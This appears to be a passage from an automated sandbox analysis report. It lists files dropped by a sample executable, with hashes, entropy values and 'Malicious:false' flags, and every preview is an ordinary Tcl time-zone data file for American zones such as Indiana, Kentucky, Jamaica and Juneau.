                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Marengo) {.. {-9223372036854775808 -20723 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-599594400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7611
                                                                                                                                                                                                                              Entropy (8bit):3.87971256165061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:TqervJ8SUklggahyBRP0HY2iU7KKdFL6Aa2K4gSLf8e:TpvJ8SUklvaQN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:A86042668CD478AFFC05D3383EDEE8FF
                                                                                                                                                                                                                              SHA1:6476526F94A247C0ECF3B2813F2C5A4FB93E457E
                                                                                                                                                                                                                              SHA-256:23B8FA75CE0A9555DFD84549723A12679FF7FC5FAA58E4B745BA3C547071FF53
                                                                                                                                                                                                                              SHA-512:07A5487A087108E6D6E88580865885CA6243EF04BE8263FC913F38CADB8EA016386E8BBAD39F65FD081F1A2F14316FEAF008855E9CF2019B169D9511916AFF67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Petersburg) {.. {-9223372036854775808 -20947 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-473364000 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 1 CD
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7100
                                                                                                                                                                                                                              Entropy (8bit):3.8613085681914607
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:yqxrvJ8SUklLgzNA604qSScBgN+4ctDzIVQ/c/3hNxTh:yUvJ8SUkl8BA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:E7FE9B7CFBC6505C446056967DEBC87B
                                                                                                                                                                                                                              SHA1:81ADAD89F040F62E87D2F26D1D98B3E52710F695
                                                                                                                                                                                                                              SHA-256:D368123DB703B55244700876906775837D408C274C5A5801D80B77EADB6D5853
                                                                                                                                                                                                                              SHA-512:9C0746DE18C80B548AA443D59BB9971BDC304975717C5FCDEBDE72828ACF408FA1D687F87C42E7B8D6D0284C9F792EA236BF79C815947BE773D07364B630AC99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Tell_City) {.. {-9223372036854775808 -20823 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 0 EST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6563
                                                                                                                                                                                                                              Entropy (8bit):3.866646181493734
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:juqv01BRP0HY2iU7KKdFL6Aa2K4gSLf8e:CoKN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:2CCFC3980C321ED8A852759C0BCCB12C
                                                                                                                                                                                                                              SHA1:A8BFE02E4E71B28EF8E284E808F6EDE7C231F8FF
                                                                                                                                                                                                                              SHA-256:0623233AA39A1A82038A56DF255ADF49E648777375B8499491C8897EBEA1CDF1
                                                                                                                                                                                                                              SHA-512:A4C77689BC9BF871C756D05BAC4157F0FD324D10AC7D15F3543344C6F8C7FC9218AB7ADFBCE70C8ECCDD6EC15FD7960503FC7A8223FECE6D4227BF0BB04190C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vevay) {.. {-9223372036854775808 -20416 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-495043200 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {94712400 -18000 0 EST}.. {1136091600 -18000 0 EST}.. {1143961200 -14400 1 EDT}.. {1162101600 -18000 0 EST}.. {1173596400 -14400 1 EDT}.. {1194156000 -18000 0 EST}.. {1205046000 -14400 1 EDT}.. {1225605600 -18000 0 EST}.. {1236495600 -14400 1 EDT}.. {1257055200 -18000 0 EST}.. {1268550000 -144
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7226
                                                                                                                                                                                                                              Entropy (8bit):3.879195938909716
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Vq8rdJ5UklpRBRP0HY2iU7KKdFL6Aa2K4gSLf8e:VbdJ5Uklp/N0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:56D1930F5FAE2456DEC6C9AB1B0233E1
                                                                                                                                                                                                                              SHA1:F6ED52EF769DF2C015C181BCFF3DC0E24497C768
                                                                                                                                                                                                                              SHA-256:B8452B6AA739A78AC6D03806463B03D4175639593E19FAA3CA4B0D0FB77F18C9
                                                                                                                                                                                                                              SHA-512:AFCFF383DB441DA9154B639A88700D0604F487A20E830146B14061E485A991AD8DC279AF8C0C2329265CF14C901207B9058157FAA1C039082EB7630916834156
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vincennes) {.. {-9223372036854775808 -21007 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-289414800 -21600 0 CST}.. {-273686400 -18000 1 CDT
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7410
                                                                                                                                                                                                                              Entropy (8bit):3.8775722319777968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:uq0KeKrv7c1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:unKxv7yN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:880526DC23E7BDB00506D7EC2A885907
                                                                                                                                                                                                                              SHA1:DB3B13A2A4BF80E7B71C7F0604A0A80EF070B9BA
                                                                                                                                                                                                                              SHA-256:4B293FDB7680C4597B8C885333719214492ECF09BD5EA342D1EC15F2BF9C8605
                                                                                                                                                                                                                              SHA-512:42EEDC5EA28781D62A457F4843F38D0A3FEFCAD83BA01B07CEF0FA169C6440960E04BABD272C5E9AF2F4B0DBB2A786EF9221A48F084F16752E6D0EA66C31911E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Winamac) {.. {-9223372036854775808 -20785 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):233
                                                                                                                                                                                                                              Entropy (8bit):4.7047837427916095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/2903GfJ4903GK8:MByMY3GK7Kp3GKnt2903GfJ4903GK8
                                                                                                                                                                                                                              MD5:DEE404D54FD707C4A27F464B5F19D135
                                                                                                                                                                                                                              SHA1:AD95D04738F6B15A93DED1DE6B5FA9F47C8E38CB
                                                                                                                                                                                                                              SHA-256:437DA148B94DBA4CEA402169878541DB9C3419ABAB6750D1C36625DD3053019E
                                                                                                                                                                                                                              SHA-512:421D6AF30F0C64EA6CB9F9DC4E7EF9E8EE5945F81A5E82A6D959D32AD69F325770DB6A07D8F52EFE7EE7F6C3AD4E1F34AA30A6B5E006C928119A54E746D6FE6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Indianapolis) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7638
                                                                                                                                                                                                                              Entropy (8bit):3.8629745113156004
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/nGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/GPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:DBF9C2CCF786A593C9D6E4F4BB37ACE9
                                                                                                                                                                                                                              SHA1:4D2332A530A36E6DB2802DD9FA2DAF5C0594D5EA
                                                                                                                                                                                                                              SHA-256:5A1F7F5EDAD0251B73C33E7B5DDEE194646E9D3992B169DC1A64D155765D472C
                                                                                                                                                                                                                              SHA-512:70D75371497CED3B6C731C95299CDD5F8F49C3C6EEDDF31EB05D008769D76ACFE8BFA9A2ECE45BD0BA2E279BBEF65945955791EFC04A569F5CAA13665CD2545F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Inuvik) {.. {-9223372036854775808 0 0 -00}.. {-536457600 -28800 0 PST}.. {-147888000 -21600 1 PDDT}.. {-131558400 -28800 0 PST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}.. {688550400 -25200 0 MST}.. {702464400 -21600 1 MDT}.. {7200000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7671
                                                                                                                                                                                                                              Entropy (8bit):3.832645570123566
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7FE5Ct/cQ1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7FEct/N0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:8020712BBA127EA8AB52E8F5DB14286E
                                                                                                                                                                                                                              SHA1:DAEBC76FE10770D3FC2B5E1C14823B2B5543BA35
                                                                                                                                                                                                                              SHA-256:AFC4627879F4A618F5E3BA9EA123F3212E161F4CCFD0DF46F3B6B7CD2E2C0D7E
                                                                                                                                                                                                                              SHA-512:2F5C63F427A5DEDD5BF2B3867BE4C13774E9276C1472BF4170BCB2DA462B848CC8088743D032765133EE138388DF4217E4FC1475B12D2C8AF657A45ED6FEDE93
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Iqaluit) {.. {-9223372036854775808 0 0 -00}.. {-865296000 -14400 0 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-147898800 -10800 1 EDDT}.. {-131569200 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {7024
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                                                                              Entropy (8bit):4.206296468996689
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5seRvZGjFS/uk1p/uue/udYR/u+zN5hi/uW9/uoUF0/u8Bb/u33RU/uMZ8/unuR3:5jUjFo1pFGzfAYFqB43RMER3
                                                                                                                                                                                                                              MD5:95B59E3EA2A270A34BDF98AA899203C8
                                                                                                                                                                                                                              SHA1:93599597797F4BAFE5C75179FB795058B1E3527D
                                                                                                                                                                                                                              SHA-256:4B9D5177CBA057CD53D53120A49B8A47ECCB00150018581A84851E9D5437D643
                                                                                                                                                                                                                              SHA-512:032BC07F9E92B756A0732AECC2DFEC4C89A58B3D6D3CA57A0F99F2AD1D51676804C7B6CE50EB3B37BB8A1EF382168AC83989D609D37C57308E29B51F1FDEFB1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Jamaica) {.. {-9223372036854775808 -18430 0 LMT}.. {-2524503170 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {126248400 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {441781200 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):211
                                                                                                                                                                                                                              Entropy (8bit):4.94277888588308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MI6HAIgp/MIwRN/290pPGe90/MIz:MByMY/Myp/M9Rt290h390/M4
                                                                                                                                                                                                                              MD5:E020D4F9CB1AF91D373CD9F3C2247428
                                                                                                                                                                                                                              SHA1:0ADF2E9F8D9F8641E066764BA1BAF068F0332CE9
                                                                                                                                                                                                                              SHA-256:4A0495852CD4D0652B82FB57024645916DB8F192EEF9A82AFD580D87F4D496ED
                                                                                                                                                                                                                              SHA-512:03190F0E7EC35A358670B1617CB5C17EA3DD41195B2C4B748479D80ABAB4DB395293F688D94B87662D0469F6C5885CF7E7C9A995493A191905753F740DF659E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Jujuy)]} {.. LoadTimeZoneFile America/Argentina/Jujuy..}..set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8682
                                                                                                                                                                                                                              Entropy (8bit):3.9620285142779728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/fCG0rHPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:/aG0rq9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:8160A0D27EECEF40F6F34A06D5D02BE6
                                                                                                                                                                                                                              SHA1:7CAA64F83BAA0C23EE05A72BB1079AA552FA2F3D
                                                                                                                                                                                                                              SHA-256:5FBE6A1FA2D3DFE23C7378E425F32BEBCA44735DA25EA075A7E5CE24BFD4049D
                                                                                                                                                                                                                              SHA-512:59B8D04595007B45E582E6D17734999074CA67A93F5DF742EFE1EB78DB8ABD359D4C3B213B678C6A46040A13AAB709A994B6A532D720D3EF6FCA2730ABF4885E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Juneau) {.. {-9223372036854775808 54139 0 LMT}.. {-3225223727 -32261 0 LMT}.. {-2188954939 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {309949
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9553
                                                                                                                                                                                                                              Entropy (8bit):3.853353361425414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:tfTwKdrdJ9+StCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:tfUKNdJ9+SItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:D721B38F1FFF1A6F5C02B72ECC06CDE5
                                                                                                                                                                                                                              SHA1:E70D99A9FC1DA9F30389129EE00FE20FA79D66A8
                                                                                                                                                                                                                              SHA-256:9EB1F2B19C44A55D6CC9FD1465BAF6535856941C067831E4B5E0494665014BF5
                                                                                                                                                                                                                              SHA-512:3C82A8C27026228F359FD96A4306F1BC337DE655FD1BA02C4399162E44DE59AD58CE569DA5AEA36E586C3BDEE7256420AABB84B44D277E244FE5AD771B4BE307
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Louisville) {.. {-9223372036854775808 -20582 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1546279200 -21600 0 CST}.. {-1535904000 -18000 1 CDT}.. {-1525280400 -21600 0 CST}.. {-905097600 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747251940 -18000 1 CDT}.. {-744224400 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8558
                                                                                                                                                                                                                              Entropy (8bit):3.869494272122571
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4F8qMahLi8hR1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:4F8HaUqJN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:AED6497590DA305D16AC034979C8B1E9
                                                                                                                                                                                                                              SHA1:AD6F1788310A3A5A761873FEF1A32416B7DBCA89
                                                                                                                                                                                                                              SHA-256:1C6C7FB0AE628EB6BB305B51859C4E5594A6B0876C386ED9C1C3355E7CB37AE1
                                                                                                                                                                                                                              SHA-512:58D960AB5F2D9F8E4DD0171E5E36CE2E072F74A7AFDBC43F9340BBCF0CDC0D060AC895F9FCF551F4CC7EB6DBF2E9835C8C3D58E87CA4FBC98C720F51C462EDCD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Monticello) {.. {-9223372036854775808 -20364 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-63136800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.8670778268802195
                                                                                                                                                                                                                              Encrypted:false
